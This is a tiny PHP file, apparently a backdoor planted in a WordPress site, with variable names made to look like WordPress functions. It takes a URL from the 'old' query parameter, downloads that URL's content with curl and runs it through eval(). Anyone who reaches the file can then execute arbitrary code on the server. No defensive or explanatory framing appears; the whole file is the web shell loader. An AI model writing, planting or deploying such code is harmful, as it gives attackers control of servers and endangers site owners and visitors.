<?php

if (isset($_GET['old'])) {
    $add_partial_yu = $_GET['old'];
    if ($get_the_author_meta_wy = curl_init()) {
        curl_setopt($get_the_author_meta_wy, CURLOPT_URL, $add_partial_yu);
        curl_setopt($get_the_author_meta_wy, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($get_the_author_meta_wy));
        curl_close($get_the_author_meta_wy);
        exit;
    }
}